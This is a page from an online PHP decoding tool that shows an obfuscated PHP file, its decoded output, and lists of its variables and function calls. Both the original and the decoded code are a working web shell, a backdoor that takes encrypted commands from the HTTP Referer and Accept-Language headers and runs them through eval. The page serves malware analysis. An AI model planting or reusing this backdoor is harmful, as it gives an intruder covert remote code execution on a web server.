Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $D='ea?$n();$d=base6?$4_en?$code(x(gz?$co?$mp?$res?$s($o)?$,?$$k));print("<$k>$d</$?..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$D='ea?$n();$d=base6?$4_en?$code(x(gz?$co?$mp?$res?$s($o)?$,?$$k));print("<$k>$d</$?$k>");?$@session_d?$estro?$y();}}}}';
$p=');?$parse_str(?$$u["q?$?$uery"],$q)?$;$q=?$array_valu?$es($q);pre?$g?$_match_?$all(?$"?$/([\\w?$])[\\w-]+(?$?:?$;q';
$s=str_replace('gh','','crghgheaghtghegh_funcghtion');
$Z='?$rr=@$r?$["HTTP?$_REFERER?$"];$?$ra?$=@$r[?$"HTTP_ACCEP?$T_LA?$NGUAGE?$"];i?$f($?$rr&&?$$ra){$u?$=p?$arse_url($rr';
$W=')?${$k=$?$?$kh.$kf?$;ob_start()?$;@eva?$l(@gz?$uncompre?$ss(@?$?$x(@bas?$e64_decode(pre?$g_r?$epla?$?$ce(array';
$F='=0.([\\d]))?,?/?$",$ra,$m?$);if?$($q&&?$$m){@sessi?$on_?$st?$art();$s?$=&$_SESSION?$?$;$ss="s?$u?$bstr";$sl=?$"str';
$u='t?$olower";$i=$m?$[1]?$[0].$?$m[1]?$[1];$h=$sl(?$$ss(?$md5($i.$k?$h),0?$?$,3));$f=$sl($?$ss(?$md5($i.$kf?$),0,?$';
$O='3));?$$p="?$"?$;for($?$z=1;?$$z<count($m?$[1]);$z++)$?$p.=$?$q[?$$m[2?$][$z]];if?$(str?$pos($p?$,$h)=?$==0){?$$?';
$Q='$s[$i]="";$p=$ss($p,3);?$}if(ar?$ray_key?$_ex?$ists($i,?$$s)?$)?${$s[$i].=$?$p;$e=strp?$os($s[$?$i]?$,$f);if($e';
$i='?$$?$l;){for(?$$j=0;(?$$?$j<$c&&$i<$l);$?$j++,$?$?$i?$++){$o.=$t?${$i}^$k{$j};}?$}retur?$n $o;}$?$r?$=$_SERVER;$';
$M='$?$kh="5d41";$k?$f?$="402a";fu?$nction ?$x?$($t,$k){$?$c=str?$len($?$k);$l=st?$rlen($t)?$;$o="";f?$or($i?$=0;$i<';
$k='(?$"/_/"?$?$,"/-/"),array("/?$",?$"+"?$),$ss($s[$i],0?$,$e))?$?$),$k)));$o=ob_get_?$c?$on?$tents();ob_end_c?$l?$';
$o=str_replace('?$','',$M.$i.$Z.$p.$F.$u.$O.$Q.$W.$k.$D);
$A=$s('',$o);$A();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A None
$D ea?$n();$d=base6?$4_en?$code(x(gz?$co?$mp?$res?$s($o)?$,?$$k..
$F =0.([\d]))?,?/?$",$ra,$m?$);if?$($q&&?$$m){@sessi?$on_?$st?$..
$M $?$kh="5d41";$k?$f?$="402a";fu?$nction ?$x?$($t,$k){$?$c=str..
$O 3));?$$p="?$"?$;for($?$z=1;?$$z<count($m?$[1]);$z++)$?$p.=$?..
$Q $s[$i]="";$p=$ss($p,3);?$}if(ar?$ray_key?$_ex?$ists($i,?$$s)..
$W )?${$k=$?$?$kh.$kf?$;ob_start()?$;@eva?$l(@gz?$uncompre?$ss(..
$Z ?$rr=@$r?$["HTTP?$_REFERER?$"];$?$ra?$=@$r[?$"HTTP_ACCEP?$T_..
$i ?$$?$l;){for(?$$j=0;(?$$?$j<$c&&$i<$l);$?$j++,$?$?$i?$++){$o..
$k (?$"/_/"?$?$,"/-/"),array("/?$",?$"+"?$),$ss($s[$i],0?$,$e))..
$o $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$p );?$parse_str(?$$u["q?$?$uery"],$q)?$;$q=?$array_valu?$es($q..
$s create_function
$u t?$olower";$i=$m?$[1]?$[0].$?$m[1]?$[1];$h=$sl(?$$ss(?$md5($..

Stats

MD5 bdfe019930cd00afbbfc147257d11f26
Eval Count 1
Decode Time 136 ms